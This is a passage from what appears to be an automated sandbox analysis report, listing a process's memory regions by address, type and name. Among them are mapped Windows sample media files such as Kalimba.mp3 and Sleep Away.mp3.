"private_0x000000007ef80000" filename = "" Region: id = 3001 start_va = 0x3350000 end_va = 0x3350fff entry_point = 0x0 region_type = private name = "private_0x0000000003350000" filename = "" Region: id = 3002 start_va = 0x40a0000 end_va = 0x40a0fff entry_point = 0x0 region_type = private name = "private_0x00000000040a0000" filename = "" Region: id = 3003 start_va = 0x40b0000 end_va = 0x40effff entry_point = 0x0 region_type = private name = "private_0x00000000040b0000" filename = "" Region: id = 3004 start_va = 0x4110000 end_va = 0x420ffff entry_point = 0x0 region_type = private name = "private_0x0000000004110000" filename = "" Region: id = 3005 start_va = 0x7ef83000 end_va = 0x7ef85fff entry_point = 0x0 region_type = private name = "private_0x000000007ef83000" filename = "" Region: id = 3006 start_va = 0x40f0000 end_va = 0x40f0fff entry_point = 0x0 region_type = private name = "private_0x00000000040f0000" filename = "" Region: id = 3007 start_va = 0x4350000 end_va = 0x4350fff entry_point = 0x0 region_type = private name = "private_0x0000000004350000" filename = "" Region: id = 3008 start_va = 0x3350000 end_va = 0x3350fff entry_point = 0x0 region_type = private name = "private_0x0000000003350000" filename = "" Region: id = 3009 start_va = 0x40a0000 end_va = 0x40a0fff entry_point = 0x0 region_type = private name = "private_0x00000000040a0000" filename = "" Region: id = 3010 start_va = 0x40f0000 end_va = 0x40f0fff entry_point = 0x0 region_type = private name = "private_0x00000000040f0000" filename = "" Region: id = 3011 start_va = 0x4350000 end_va = 0x4350fff entry_point = 0x0 region_type = private name = "private_0x0000000004350000" filename = "" Region: id = 3012 start_va = 0x3350000 end_va = 0x3350fff entry_point = 0x0 region_type = private name = "private_0x0000000003350000" filename = "" Region: id = 3013 start_va = 0x40a0000 end_va = 0x40dffff entry_point = 0x0 region_type = private name = "private_0x00000000040a0000" filename = "" Region: id = 3014 start_va = 0x40e0000 end_va = 0x40e0fff entry_point = 0x0 region_type = private name = "private_0x00000000040e0000" filename = "" Region: id = 3015 start_va = 0x4210000 end_va = 0x424ffff entry_point = 0x0 region_type = private name = "private_0x0000000004210000" filename = "" Region: id = 3016 start_va = 0x4250000 end_va = 0x434ffff entry_point = 0x0 region_type = private name = "private_0x0000000004250000" filename = "" Region: id = 3017 start_va = 0x7ef80000 end_va = 0x7ef82fff entry_point = 0x0 region_type = private name = "private_0x000000007ef80000" filename = "" Region: id = 3018 start_va = 0x3350000 end_va = 0x3350fff entry_point = 0x0 region_type = private name = "private_0x0000000003350000" filename = "" Region: id = 3019 start_va = 0x40a0000 end_va = 0x40a0fff entry_point = 0x0 region_type = private name = "private_0x00000000040a0000" filename = "" Region: id = 3020 start_va = 0x3350000 end_va = 0x3350fff entry_point = 0x0 region_type = private name = "private_0x0000000003350000" filename = "" Region: id = 3021 start_va = 0x40a0000 end_va = 0x40dffff entry_point = 0x0 region_type = private name = "private_0x00000000040a0000" filename = "" Region: id = 3022 start_va = 0x4110000 end_va = 0x420ffff entry_point = 0x0 region_type = private name = "private_0x0000000004110000" filename = "" Region: id = 3023 start_va = 0x7ef83000 end_va = 0x7ef85fff entry_point = 0x0 region_type = private name = "private_0x000000007ef83000" filename = "" Region: id = 3024 start_va = 0x40e0000 end_va = 0x40e0fff entry_point = 0x0 region_type = private name = "private_0x00000000040e0000" filename = "" Region: id = 3025 start_va = 0x3350000 end_va = 0x3350fff entry_point = 0x0 region_type = private name = "private_0x0000000003350000" filename = "" Region: id = 3026 start_va = 0x40e0000 end_va = 0x40e0fff entry_point = 0x0 region_type = private name = "private_0x00000000040e0000" filename = "" Region: id = 3027 start_va = 0x40f0000 end_va = 0x40f0fff entry_point = 0x0 region_type = private name = "private_0x00000000040f0000" filename = "" Region: id = 3028 start_va = 0x4210000 end_va = 0x424ffff entry_point = 0x0 region_type = private name = "private_0x0000000004210000" filename = "" Region: id = 3029 start_va = 0x4250000 end_va = 0x434ffff entry_point = 0x0 region_type = private name = "private_0x0000000004250000" filename = "" Region: id = 3030 start_va = 0x7ef80000 end_va = 0x7ef82fff entry_point = 0x0 region_type = private name = "private_0x000000007ef80000" filename = "" Region: id = 3031 start_va = 0x4350000 end_va = 0x4350fff entry_point = 0x0 region_type = private name = "private_0x0000000004350000" filename = "" Region: id = 3032 start_va = 0x4560000 end_va = 0x459ffff entry_point = 0x0 region_type = private name = "private_0x0000000004560000" filename = "" Region: id = 3033 start_va = 0x45a0000 end_va = 0x469ffff entry_point = 0x0 region_type = private name = "private_0x00000000045a0000" filename = "" Region: id = 3034 start_va = 0x46a0000 end_va = 0x46a0fff entry_point = 0x0 region_type = private name = "private_0x00000000046a0000" filename = "" Region: id = 3035 start_va = 0x7ef7d000 end_va = 0x7ef7ffff entry_point = 0x0 region_type = private name = "private_0x000000007ef7d000" filename = "" Region: id = 3036 start_va = 0x46b0000 end_va = 0x46b0fff entry_point = 0x0 region_type = private name = "private_0x00000000046b0000" filename = "" Region: id = 3037 start_va = 0x3350000 end_va = 0x3350fff entry_point = 0x0 region_type = private name = "private_0x0000000003350000" filename = "" Region: id = 3038 start_va = 0x46c0000 end_va = 0x46fffff entry_point = 0x0 region_type = private name = "private_0x00000000046c0000" filename = "" Region: id = 3039 start_va = 0x4700000 end_va = 0x47fffff entry_point = 0x0 region_type = private name = "private_0x0000000004700000" filename = "" Region: id = 3040 start_va = 0x7ef7a000 end_va = 0x7ef7cfff entry_point = 0x0 region_type = private name = "private_0x000000007ef7a000" filename = "" Region: id = 3041 start_va = 0x40a0000 end_va = 0x40a0fff entry_point = 0x0 region_type = private name = "private_0x00000000040a0000" filename = "" Region: id = 3042 start_va = 0x40b0000 end_va = 0x40effff entry_point = 0x0 region_type = private name = "private_0x00000000040b0000" filename = "" Region: id = 3043 start_va = 0x4110000 end_va = 0x420ffff entry_point = 0x0 region_type = private name = "private_0x0000000004110000" filename = "" Region: id = 3044 start_va = 0x7ef83000 end_va = 0x7ef85fff entry_point = 0x0 region_type = private name = "private_0x000000007ef83000" filename = "" Region: id = 3045 start_va = 0x4560000 end_va = 0x4560fff entry_point = 0x0 region_type = private name = "private_0x0000000004560000" filename = "" Region: id = 3046 start_va = 0x4570000 end_va = 0x4570fff entry_point = 0x0 region_type = private name = "private_0x0000000004570000" filename = "" Region: id = 3047 start_va = 0x3350000 end_va = 0x3350fff entry_point = 0x0 region_type = private name = "private_0x0000000003350000" filename = "" Region: id = 3048 start_va = 0x40a0000 end_va = 0x40a0fff entry_point = 0x0 region_type = private name = "private_0x00000000040a0000" filename = "" Region: id = 3049 start_va = 0x3350000 end_va = 0x3350fff entry_point = 0x0 region_type = private name = "private_0x0000000003350000" filename = "" Region: id = 3050 start_va = 0x40a0000 end_va = 0x40dffff entry_point = 0x0 region_type = private name = "private_0x00000000040a0000" filename = "" Region: id = 3051 start_va = 0x4110000 end_va = 0x420ffff entry_point = 0x0 region_type = private name = "private_0x0000000004110000" filename = "" Region: id = 3052 start_va = 0x7ef83000 end_va = 0x7ef85fff entry_point = 0x0 region_type = private name = "private_0x000000007ef83000" filename = "" Region: id = 3053 start_va = 0x40e0000 end_va = 0x40e0fff entry_point = 0x0 region_type = private name = "private_0x00000000040e0000" filename = "" Region: id = 3054 start_va = 0x4210000 end_va = 0x424ffff entry_point = 0x0 region_type = private name = "private_0x0000000004210000" filename = "" Region: id = 3055 start_va = 0x4250000 end_va = 0x434ffff entry_point = 0x0 region_type = private name = "private_0x0000000004250000" filename = "" Region: id = 3056 start_va = 0x7ef80000 end_va = 0x7ef82fff entry_point = 0x0 region_type = private name = "private_0x000000007ef80000" filename = "" Region: id = 3057 start_va = 0x3350000 end_va = 0x3350fff entry_point = 0x0 region_type = private name = "private_0x0000000003350000" filename = "" Region: id = 3058 start_va = 0x40a0000 end_va = 0x40a0fff entry_point = 0x0 region_type = private name = "private_0x00000000040a0000" filename = "" Region: id = 3059 start_va = 0x40b0000 end_va = 0x40effff entry_point = 0x0 region_type = private name = "private_0x00000000040b0000" filename = "" Region: id = 3060 start_va = 0x40f0000 end_va = 0x40f0fff entry_point = 0x0 region_type = private name = "private_0x00000000040f0000" filename = "" Region: id = 3061 start_va = 0x4110000 end_va = 0x420ffff entry_point = 0x0 region_type = private name = "private_0x0000000004110000" filename = "" Region: id = 3062 start_va = 0x7ef83000 end_va = 0x7ef85fff entry_point = 0x0 region_type = private name = "private_0x000000007ef83000" filename = "" Region: id = 3063 start_va = 0x4350000 end_va = 0x4350fff entry_point = 0x0 region_type = private name = "private_0x0000000004350000" filename = "" Region: id = 3064 start_va = 0x4560000 end_va = 0x459ffff entry_point = 0x0 region_type = private name = "private_0x0000000004560000" filename = "" Region: id = 3065 start_va = 0x45a0000 end_va = 0x469ffff entry_point = 0x0 region_type = private name = "private_0x00000000045a0000" filename = "" Region: id = 3066 start_va = 0x7ef7d000 end_va = 0x7ef7ffff entry_point = 0x0 region_type = private name = "private_0x000000007ef7d000" filename = "" Region: id = 3067 start_va = 0x3350000 end_va = 0x3350fff entry_point = 0x0 region_type = private name = "private_0x0000000003350000" filename = "" Region: id = 3068 start_va = 0x40a0000 end_va = 0x40a0fff entry_point = 0x0 region_type = private name = "private_0x00000000040a0000" filename = "" Region: id = 3069 start_va = 0x40f0000 end_va = 0x40f0fff entry_point = 0x0 region_type = private name = "private_0x00000000040f0000" filename = "" Region: id = 3070 start_va = 0x4210000 end_va = 0x4210fff entry_point = 0x0 region_type = private name = "private_0x0000000004210000" filename = "" Region: id = 3071 start_va = 0x3350000 end_va = 0x3350fff entry_point = 0x0 region_type = private name = "private_0x0000000003350000" filename = "" Region: id = 3072 start_va = 0x4220000 end_va = 0x425ffff entry_point = 0x0 region_type = private name = "private_0x0000000004220000" filename = "" Region: id = 3073 start_va = 0x4260000 end_va = 0x435ffff entry_point = 0x0 region_type = private name = "private_0x0000000004260000" filename = "" Region: id = 3074 start_va = 0x7ef80000 end_va = 0x7ef82fff entry_point = 0x0 region_type = private name = "private_0x000000007ef80000" filename = "" Region: id = 3075 start_va = 0x40a0000 end_va = 0x40a0fff entry_point = 0x0 region_type = private name = "private_0x00000000040a0000" filename = "" Region: id = 3076 start_va = 0x40f0000 end_va = 0x40f0fff entry_point = 0x0 region_type = private name = "private_0x00000000040f0000" filename = "" Region: id = 3077 start_va = 0x4210000 end_va = 0x4210fff entry_point = 0x0 region_type = private name = "private_0x0000000004210000" filename = "" Region: id = 3078 start_va = 0x3350000 end_va = 0x3350fff entry_point = 0x0 region_type = private name = "private_0x0000000003350000" filename = "" Region: id = 3079 start_va = 0x40a0000 end_va = 0x40a0fff entry_point = 0x0 region_type = private name = "private_0x00000000040a0000" filename = "" Region: id = 3080 start_va = 0x40b0000 end_va = 0x40effff entry_point = 0x0 region_type = private name = "private_0x00000000040b0000" filename = "" Region: id = 3081 start_va = 0x40f0000 end_va = 0x40f0fff entry_point = 0x0 region_type = private name = "private_0x00000000040f0000" filename = "" Region: id = 3082 start_va = 0x4110000 end_va = 0x420ffff entry_point = 0x0 region_type = private name = "private_0x0000000004110000" filename = "" Region: id = 3083 start_va = 0x7ef83000 end_va = 0x7ef85fff entry_point = 0x0 region_type = private name = "private_0x000000007ef83000" filename = "" Region: id = 3084 start_va = 0x4210000 end_va = 0x4210fff entry_point = 0x0 region_type = private name = "private_0x0000000004210000" filename = "" Region: id = 3085 start_va = 0x4560000 end_va = 0x459ffff entry_point = 0x0 region_type = private name = "private_0x0000000004560000" filename = "" Region: id = 3086 start_va = 0x45a0000 end_va = 0x469ffff entry_point = 0x0 region_type = private name = "private_0x00000000045a0000" filename = "" Region: id = 3087 start_va = 0x7ef7d000 end_va = 0x7ef7ffff entry_point = 0x0 region_type = private name = "private_0x000000007ef7d000" filename = "" Region: id = 3088 start_va = 0x40b0000 end_va = 0x40b0fff entry_point = 0x0 region_type = private name = "private_0x00000000040b0000" filename = "" Region: id = 3089 start_va = 0x40c0000 end_va = 0x40c0fff entry_point = 0x0 region_type = private name = "private_0x00000000040c0000" filename = "" Region: id = 3090 start_va = 0x3350000 end_va = 0x3350fff entry_point = 0x0 region_type = private name = "private_0x0000000003350000" filename = "" Region: id = 3091 start_va = 0x4110000 end_va = 0x414ffff entry_point = 0x0 region_type = private name = "private_0x0000000004110000" filename = "" Region: id = 3092 start_va = 0x4150000 end_va = 0x424ffff entry_point = 0x0 region_type = private name = "private_0x0000000004150000" filename = "" Region: id = 3093 start_va = 0x7ef83000 end_va = 0x7ef85fff entry_point = 0x0 region_type = private name = "private_0x000000007ef83000" filename = "" Region: id = 3094 start_va = 0x40a0000 end_va = 0x40a0fff entry_point = 0x0 region_type = private name = "private_0x00000000040a0000" filename = "" Region: id = 3095 start_va = 0x40b0000 end_va = 0x40effff entry_point = 0x0 region_type = private name = "private_0x00000000040b0000" filename = "" Region: id = 3096 start_va = 0x4250000 end_va = 0x434ffff entry_point = 0x0 region_type = private name = "private_0x0000000004250000" filename = "" Region: id = 3097 start_va = 0x7ef80000 end_va = 0x7ef82fff entry_point = 0x0 region_type = private name = "private_0x000000007ef80000" filename = "" Region: id = 3098 start_va = 0x3350000 end_va = 0x3350fff entry_point = 0x0 region_type = private name = "private_0x0000000003350000" filename = "" Region: id = 3099 start_va = 0x40a0000 end_va = 0x40a0fff entry_point = 0x0 region_type = private name = "private_0x00000000040a0000" filename = "" Region: id = 3100 start_va = 0x40f0000 end_va = 0x40f0fff entry_point = 0x0 region_type = private name = "private_0x00000000040f0000" filename = "" Region: id = 3101 start_va = 0x4110000 end_va = 0x414ffff entry_point = 0x0 region_type = private name = "private_0x0000000004110000" filename = "" Region: id = 3102 start_va = 0x4150000 end_va = 0x424ffff entry_point = 0x0 region_type = private name = "private_0x0000000004150000" filename = "" Region: id = 3103 start_va = 0x7ef83000 end_va = 0x7ef85fff entry_point = 0x0 region_type = private name = "private_0x000000007ef83000" filename = "" Region: id = 3104 start_va = 0x4350000 end_va = 0x4350fff entry_point = 0x0 region_type = private name = "private_0x0000000004350000" filename = "" Region: id = 3105 start_va = 0x40a0000 end_va = 0x40dffff entry_point = 0x0 region_type = private name = "private_0x00000000040a0000" filename = "" Region: id = 3106 start_va = 0x3350000 end_va = 0x3350fff entry_point = 0x0 region_type = private name = "private_0x0000000003350000" filename = "" Region: id = 3107 start_va = 0x40e0000 end_va = 0x40e0fff entry_point = 0x0 region_type = private name = "private_0x00000000040e0000" filename = "" Region: id = 3108 start_va = 0x40f0000 end_va = 0x40f0fff entry_point = 0x0 region_type = private name = "private_0x00000000040f0000" filename = "" Region: id = 3109 start_va = 0x4350000 end_va = 0x4350fff entry_point = 0x0 region_type = private name = "private_0x0000000004350000" filename = "" Region: id = 3110 start_va = 0x4560000 end_va = 0x459ffff entry_point = 0x0 region_type = private name = "private_0x0000000004560000" filename = "" Region: id = 3111 start_va = 0x45a0000 end_va = 0x469ffff entry_point = 0x0 region_type = private name = "private_0x00000000045a0000" filename = "" Region: id = 3112 start_va = 0x7ef7d000 end_va = 0x7ef7ffff entry_point = 0x0 region_type = private name = "private_0x000000007ef7d000" filename = "" Region: id = 3113 start_va = 0x3350000 end_va = 0x3350fff entry_point = 0x0 region_type = private name = "private_0x0000000003350000" filename = "" Region: id = 3114 start_va = 0x40a0000 end_va = 0x40dffff entry_point = 0x0 region_type = private name = "private_0x00000000040a0000" filename = "" Region: id = 3115 start_va = 0x4110000 end_va = 0x420ffff entry_point = 0x0 region_type = private name = "private_0x0000000004110000" filename = "" Region: id = 3116 start_va = 0x40e0000 end_va = 0x40e0fff entry_point = 0x0 region_type = private name = "private_0x00000000040e0000" filename = "" Region: id = 3117 start_va = 0x40f0000 end_va = 0x40f0fff entry_point = 0x0 region_type = private name = "private_0x00000000040f0000" filename = "" Region: id = 3118 start_va = 0x4210000 end_va = 0x424ffff entry_point = 0x0 region_type = private name = "private_0x0000000004210000" filename = "" Region: id = 3119 start_va = 0x4250000 end_va = 0x434ffff entry_point = 0x0 region_type = private name = "private_0x0000000004250000" filename = "" Region: id = 3120 start_va = 0x7ef80000 end_va = 0x7ef82fff entry_point = 0x0 region_type = private name = "private_0x000000007ef80000" filename = "" Region: id = 3121 start_va = 0x4350000 end_va = 0x4350fff entry_point = 0x0 region_type = private name = "private_0x0000000004350000" filename = "" Region: id = 3122 start_va = 0x3350000 end_va = 0x3350fff entry_point = 0x0 region_type = private name = "private_0x0000000003350000" filename = "" Region: id = 3123 start_va = 0x40e0000 end_va = 0x40e0fff entry_point = 0x0 region_type = private name = "private_0x00000000040e0000" filename = "" Region: id = 3124 start_va = 0x40f0000 end_va = 0x40f0fff entry_point = 0x0 region_type = private name = "private_0x00000000040f0000" filename = "" Region: id = 3125 start_va = 0x4350000 end_va = 0x4350fff entry_point = 0x0 region_type = private name = "private_0x0000000004350000" filename = "" Region: id = 3126 start_va = 0x3350000 end_va = 0x3350fff entry_point = 0x0 region_type = private name = "private_0x0000000003350000" filename = "" Region: id = 3127 start_va = 0x40e0000 end_va = 0x40e0fff entry_point = 0x0 region_type = private name = "private_0x00000000040e0000" filename = "" Region: id = 3128 start_va = 0x3350000 end_va = 0x3350fff entry_point = 0x0 region_type = private name = "private_0x0000000003350000" filename = "" Region: id = 3129 start_va = 0x40e0000 end_va = 0x40e0fff entry_point = 0x0 region_type = private name = "private_0x00000000040e0000" filename = "" Region: id = 3130 start_va = 0x4210000 end_va = 0x424ffff entry_point = 0x0 region_type = private name = "private_0x0000000004210000" filename = "" Region: id = 3131 start_va = 0x4250000 end_va = 0x434ffff entry_point = 0x0 region_type = private name = "private_0x0000000004250000" filename = "" Region: id = 3132 start_va = 0x7ef80000 end_va = 0x7ef82fff entry_point = 0x0 region_type = private name = "private_0x000000007ef80000" filename = "" Region: id = 3133 start_va = 0x40f0000 end_va = 0x40f0fff entry_point = 0x0 region_type = private name = "private_0x00000000040f0000" filename = "" Region: id = 3134 start_va = 0x4350000 end_va = 0x4350fff entry_point = 0x0 region_type = private name = "private_0x0000000004350000" filename = "" Region: id = 3135 start_va = 0x40a0000 end_va = 0x40dffff entry_point = 0x0 region_type = private name = "private_0x00000000040a0000" filename = "" Region: id = 3136 start_va = 0x4110000 end_va = 0x420ffff entry_point = 0x0 region_type = private name = "private_0x0000000004110000" filename = "" Region: id = 3137 start_va = 0x4560000 end_va = 0x483cfff entry_point = 0x4560000 region_type = mapped_file name = "kalimba.mp3" filename = "\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3" (normalized: "c:\\users\\public\\music\\sample music\\kalimba.mp3") Region: id = 3138 start_va = 0x7ef83000 end_va = 0x7ef85fff entry_point = 0x0 region_type = private name = "private_0x000000007ef83000" filename = "" Region: id = 3139 start_va = 0x3350000 end_va = 0x3350fff entry_point = 0x0 region_type = private name = "private_0x0000000003350000" filename = "" Region: id = 3140 start_va = 0x40e0000 end_va = 0x40e0fff entry_point = 0x0 region_type = private name = "private_0x00000000040e0000" filename = "" Region: id = 3141 start_va = 0x4210000 end_va = 0x424ffff entry_point = 0x0 region_type = private name = "private_0x0000000004210000" filename = "" Region: id = 3142 start_va = 0x4250000 end_va = 0x434ffff entry_point = 0x0 region_type = private name = "private_0x0000000004250000" filename = "" Region: id = 3143 start_va = 0x4840000 end_va = 0x4b1cfff entry_point = 0x4840000 region_type = mapped_file name = "maid with the flaxen hair.mp3" filename = "\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3" (normalized: "c:\\users\\public\\music\\sample music\\maid with the flaxen hair.mp3") Region: id = 3144 start_va = 0x7ef80000 end_va = 0x7ef82fff entry_point = 0x0 region_type = private name = "private_0x000000007ef80000" filename = "" Region: id = 3145 start_va = 0x40f0000 end_va = 0x40f0fff entry_point = 0x0 region_type = private name = "private_0x00000000040f0000" filename = "" Region: id = 3146 start_va = 0x4350000 end_va = 0x4350fff entry_point = 0x0 region_type = private name = "private_0x0000000004350000" filename = "" Region: id = 3147 start_va = 0x4b20000 end_va = 0x4b5ffff entry_point = 0x0 region_type = private name = "private_0x0000000004b20000" filename = "" Region: id = 3148 start_va = 0x4b60000 end_va = 0x4c5ffff entry_point = 0x0 region_type = private name = "private_0x0000000004b60000" filename = "" Region: id = 3149 start_va = 0x4c60000 end_va = 0x4f3cfff entry_point = 0x4c60000 region_type = mapped_file name = "sleep away.mp3" filename = "\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3" (normalized: "c:\\users\\public\\music\\sample music\\sleep away.mp3") Region: id = 3150 start_va = 0x7ef7d000 end_va = 0x7ef7ffff entry_point = 0x0 region_type = private name = "private_0x000000007ef7d000" filename = "" Region: id = 3151 start_va = 0x4f40000 end_va = 0x4f40fff entry_point = 0x0 region_type = private name = "private_0x0000000004f40000" filename = "" Region: id = 3152 start_va = 0x4f50000 end_va = 0x4f50fff entry_point = 0x0 region_type = private name = "private_0x0000000004f50000" filename = "" Region: id = 3153 start_va = 0x4560000 end_va = 0x459ffff entry_point = 0x0 region_type = private name = "private_0x0000000004560000" filename = "" Region: id = 3154 start_va = 0x45a0000 end_va = 0x469ffff entry_point = 0x0 region_type = private name = "private_0x00000000045a0000" filename = "" Region: id = 3155 start_va = 0x7ef7a000 end_va = 0x7ef7cfff entry_point = 0x0 region_type = private name = "private_0x000000007ef7a000" filename = "" Region: id = 3156 start_va = 0x46a0000 end_va = 0x46a0fff entry_point = 0x0 region_type = private name = "private_0x00000000046a0000" filename = "" Region: id = 3157 start_va = 0x46b0000 end_va = 0x46b0fff entry_point = 0x0 region_type = private name = "private_0x00000000046b0000" filename = "" Region: id = 3158 start_va = 0x46c0000 end_va = 0x46fffff entry_point = 0x0 region_type = private name = "private_0x00000000046c0000" filename = "" Region: id = 3159 start_va = 0x4700000 end_va = 0x47fffff entry_point = 0x0 region_type = private name = "private_0x0000000004700000" filename = "" Region: id = 3160 start_va = 0x7ef77000 end_va = 0x7ef79fff entry_point = 0x0 region_type = private name = "private_0x000000007ef77000" filename = "" Region: id = 3161 start_va = 0x3350000 end_va = 0x3350fff entry_point = 0x0 region_type = private name = "private_0x0000000003350000" filename = "" Region: id = 3162 start_va = 0x4110000 end_va = 0x41e6fff entry_point = 0x0 region_type = private name = "private_0x0000000004110000" filename = "" Region: id = 3163 start_va = 0x40a0000 end_va = 0x40a0fff entry_point = 0x0 region_type = private name = "private_0x00000000040a0000" filename = "" Region: id = 3164 start_va = 0x40b0000 end_va = 0x40effff entry_point = 0x0 region_type = private name = "private_0x00000000040b0000" filename = "" Region: id = 3165 start_va = 0x40f0000 end_va = 0x40f0fff entry_point = 0x0 region_type = private name = "private_0x00000000040f0000" filename = "" Region: id = 3166 start_va = 0x41f0000 end_va = 0x42effff entry_point = 0x0 region_type = private name = "private_0x00000000041f0000" filename = "" Region: id = 3167 start_va = 0x4560000 end_va = 0x462efff entry_point = 0x0 region_type = private name = "private_0x0000000004560000" filename = "" Region: id = 3168 start_va = 0x7ef83000 end_va = 0x7ef85fff entry_point = 0x0 region_type = private name = "private_0x000000007ef83000" filename = "" Region: id = 3169 start_va = 0x42f0000 end_va = 0x42f0fff entry_point = 0x0 region_type = private name = "private_0x00000000042f0000" filename = "" Region: id = 3170 start_va = 0x4300000 end_va = 0x433ffff entry_point = 0x0 region_type = private name = "private_0x0000000004300000" filename = "" Region: id = 3171 start_va = 0x4800000 end_va = 0x48fffff entry_point = 0x0 region_type = private name = "private_0x0000000004800000" filename = "" Region: id = 3172 start_va = 0x7ef80000 end_va = 0x7ef82fff entry_point = 0x0 region_type = private name = "private_0x000000007ef80000" filename = "" Region: id = 3173 start_va = 0x3350000 end_va = 0x3350fff entry_point = 0x0 region_type = private name = "private_0x0000000003350000" filename = "" Region: id = 3174 start_va = 0x40a0000 end_va = 0x40a0fff entry_point = 0x0 region_type = private name = "private_0x00000000040a0000" filename = "" Region: id = 3175 start_va = 0x4630000 end_va = 0x466ffff entry_point = 0x0 region_type = private name = "private_0x0000000004630000" filename = "" Region: id = 3176 start_va = 0x4900000 end_va = 0x49fffff entry_point = 0x0 region_type = private name = "private_0x0000000004900000" filename = "" Region: id = 3177 start_va = 0x7ef7a000 end_va = 0x7ef7cfff entry_point = 0x0 region_type = private name = "private_0x000000007ef7a000" filename = "" Region: id = 3178 start_va = 0x40b0000 end_va = 0x40b0fff entry_point = 0x0 region_type = private name = "private_0x00000000040b0000" filename = "" Region: id = 3179 start_va = 0x4110000 end_va = 0x41a1fff entry_point = 0x0 region_type = private name = "private_0x0000000004110000" filename = "" Region: id = 3180 start_va = 0x40c0000 end_va = 0x40c0fff entry_point = 0x0 region_type = private name = "private_0x00000000040c0000" filename = "" Region: id = 3181 start_va = 0x41b0000 end_va = 0x41effff entry_point = 0x0 region_type = private name = "private_0x00000000041b0000" filename = "" Region: id = 3182 start_va = 0x41f0000 end_va = 0x42effff entry_point = 0x0 region_type = private name = "private_0x00000000041f0000" filename = "" Region: id = 3183 start_va = 0x7ef83000 end_va = 0x7ef85fff entry_point = 0x0 region_type = private name = "private_0x000000007ef83000" filename = "" Region: id = 3184 start_va = 0x3350000 end_va = 0x3350fff entry_point = 0x0 region_type = private name = "private_0x0000000003350000" filename = "" Region: id = 3185 start_va = 0x4560000 end_va = 0x461dfff entry_point = 0x0 region_type = private name = "private_0x0000000004560000" filename = "" Region: id = 3186 start_va = 0x40a0000 end_va = 0x40a0fff entry_point = 0x0 region_type = private name = "private_0x00000000040a0000" filename = "" Region: id = 3187 start_va = 0x40b0000 end_va = 0x40effff entry_point = 0x0 region_type = private name = "private_0x00000000040b0000" filename = "" Region: id = 3188 start_va = 0x40f0000 end_va = 0x40f0fff entry_point = 0x0 region_type = private name = "private_0x00000000040f0000" filename = "" Region: id = 3189 start_va = 0x4620000 end_va = 0x471ffff entry_point = 0x0 region_type = private name = "private_0x0000000004620000" filename = "" Region: id = 3190 start_va = 0x4720000 end_va = 0x47defff entry_point = 0x0 region_type = private name = "private_0x0000000004720000" filename = "" Region: id = 3191 start_va = 0x7ef80000 end_va = 0x7ef82fff entry_point = 0x0 region_type = private name = "private_0x000000007ef80000" filename = "" Region: id = 3192 start_va = 0x4110000 end_va = 0x4110fff entry_point = 0x0 region_type = private name = "private_0x0000000004110000" filename = "" Region: id = 3193 start_va = 0x3350000 end_va = 0x3350fff entry_point = 0x0 region_type = private name = "private_0x0000000003350000" filename = "" Region: id = 3194 start_va = 0x4120000 end_va = 0x415ffff entry_point = 0x0 region_type = private name = "private_0x0000000004120000" filename = "" Region: id = 3195 start_va = 0x4160000 end_va = 0x425ffff entry_point = 0x0 region_type = private name = "private_0x0000000004160000" filename = "" Region: id = 3196 start_va = 0x4260000 end_va = 0x42e9fff entry_point = 0x0 region_type = private name = "private_0x0000000004260000" filename = "" Region: id = 3197 start_va = 0x40a0000 end_va = 0x40a0fff entry_point = 0x0 region_type = private name = "private_0x00000000040a0000" filename = "" Region: id = 3198 start_va = 0x42f0000 end_va = 0x432ffff entry_point = 0x0 region_type = private name = "private_0x00000000042f0000" filename = "" Region: id = 3199 start_va = 0x47e0000 end_va = 0x48dffff entry_point = 0x0 region_type = private name = "private_0x00000000047e0000" filename = "" Region: id = 3200 start_va = 0x7ef7a000 end_va = 0x7ef7cfff entry_point = 0x0 region_type = private name = "private_0x000000007ef7a000" filename = "" Region: id = 3201 start_va = 0x40f0000 end_va = 0x40f0fff entry_point = 0x0 region_type = private name = "private_0x00000000040f0000" filename = "" Region: id = 3202 start_va = 0x4560000 end_va = 0x461dfff entry_point = 0x0 region_type = private name = "private_0x0000000004560000" filename = "" Region: id = 3203 start_va = 0x4110000 end_va = 0x4110fff entry_point = 0x0 region_type = private name = "private_0x0000000004110000" filename = "" Region: id = 3204 start_va = 0x3350000 end_va = 0x3350fff entry_point = 0x0 region_type = private name = "private_0x0000000003350000" filename = "" Region: id = 3205 start_va = 0x4120000 end_va = 0x41b7fff entry_point = 0x0 region_type = private name = "private_0x0000000004120000" filename = "" Region: id = 3206 start_va = 0x40a0000 end_va = 0x40a0fff entry_point = 0x0 region_type = private name = "private_0x00000000040a0000" filename = "" Region: id = 3207 start_va = 0x41c0000 end_va = 0x41fffff entry_point = 0x0 region_type = private name = "private_0x00000000041c0000" filename = "" Region: id = 3208 start_va = 0x48e0000 end_va = 0x49dffff entry_point = 0x0 region_type = private name = "private_0x00000000048e0000" filename = "" Region: id = 3209 start_va = 0x7ef83000 end_va = 0x7ef85fff entry_point = 0x0 region_type = private name = "private_0x000000007ef83000" filename = "" Region: id = 3210 start_va = 0x40f0000 end_va = 0x40f0fff entry_point = 0x0 region_type = private name = "private_0x00000000040f0000" filename = "" Region: id = 3211 start_va = 0x4110000 end_va = 0x4110fff entry_point = 0x0 region_type = private name = "private_0x0000000004110000" filename = "" Region: id = 3212 start_va = 0x4200000 end_va = 0x423ffff entry_point = 0x0 region_type = private name = "private_0x0000000004200000" filename = "" Region: id = 3213 start_va = 0x4240000 end_va = 0x433ffff entry_point = 0x0 region_type = private name = "private_0x0000000004240000" filename = "" Region: id = 3214 start_va = 0x7ef7a000 end_va = 0x7ef7cfff entry_point = 0x0 region_type = private name = "private_0x000000007ef7a000" filename = "" Region: id = 3215 start_va = 0x3350000 end_va = 0x3350fff entry_point = 0x0 region_type = private name = "private_0x0000000003350000" filename = "" Region: id = 3216 start_va = 0x40a0000 end_va = 0x40a0fff entry_point = 0x0 region_type = private name = "private_0x00000000040a0000" filename = "" Region: id = 3217 start_va = 0x40b0000 end_va = 0x40effff entry_point = 0x0 region_type = private name = "private_0x00000000040b0000" filename = "" Region: id = 3218 start_va = 0x4560000 end_va = 0x465ffff entry_point = 0x0 region_type = private name = "private_0x0000000004560000" filename = "" Region: id = 3219 start_va = 0x4f60000 end_va = 0x523cfff entry_point = 0x4f60000 region_type = mapped_file name = "win7_scenic-demoshort_raw.wtv" filename = "\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv" (normalized: "c:\\users\\public\\recorded tv\\sample 